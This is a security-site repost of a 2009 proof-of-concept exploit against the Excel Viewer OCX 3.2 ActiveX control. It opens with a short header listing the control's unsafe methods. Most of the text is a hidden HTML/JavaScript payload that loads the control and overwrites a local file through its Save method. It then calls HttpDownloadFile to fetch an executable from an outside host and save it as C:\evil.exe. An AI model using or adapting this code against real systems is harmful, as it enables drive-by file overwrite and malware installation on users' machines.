首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit 来源：www.vfcocus.net 作者：Luja 发布时间：2009-01-13   <html> <body> /* --=0-0-000000000--x==-xxxxxxxxx<br/>   -     Excel Viewer OCX 3.2        <br/>     homepage: www.officeocx.com <br/>     download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>   - RegKey Safe for Script: True<br/>   - RegKey Safe for Init: True   <br/>   - Implements IObjectSafety: True <br/>   - IDisp Safe:  Safe for untrusted: caller,data <br/>    - IPersist Safe:  Safe for untrusted: caller,data  <br/>   - IPStorage Safe:  Safe for untrusted: caller,data  <br>   - Tested on Avant Browser 11.7.21 ie 6                                                        <br/> Vuln:                                                 <br/>    1) Arbitrary File Download [HttpDownloadFile]<br/>    2) Arbitrary file owerwrite [Save]  <br/>                                          <br/>   --==0-0000000011011110===    <br/>     Propably it worst apps i ever see                      <br/>     this is  funy  that It is meant as Safe for scripting   <br/>     They want sell it l0l <br/>              ---000----------++++---------------000  <br/>          Alfons Luja                    <br/>      Pozdrawiam swoich fanóF               <br/>            9002                            <br/>             :P                              <br/> 00 -0000000000000000===------------------x <br/> */<br/> <div style="visibility:hidden;"> <object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object> <script type="text/javascript"> /*     I dont know why but this code act correct only first time     later it just crash ie     In avant browser always is ok but it is necessary to wait a lot time     to finsh loading     - strange :x */    try{     var obj = document.getElementById('kupa');     var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";     var loc = "C:\evil.exe";     obj.Save("C:\owerwrite.ini");     obj.HttpDownloadFile(rem,loc); } catch(err){        window.alert('Poc failed'); } </script> </div> </body> </html>     [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Triologic Media Player 7 (.m3u ·Winamp <= 5.541 (mp3/aiff) Mul ·Comersus Shopping Cart <= v6 R ·Simple Machines Forum - Destro ·VUPlayer 2.49 .ASX File (Unive ·Silentum Uploader 1.4.0 Remote ·Word Viewer OCX 3.2 ActiveX (S ·Microsoft HTML Workshop <= 4.7 ·Office Viewer ActiveX Control ·Microsoft HTML Workshop <= 4.7 ·Office Viewer ActiveX Control ·phpMDJ <= 1.0.3 (id_animateur)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved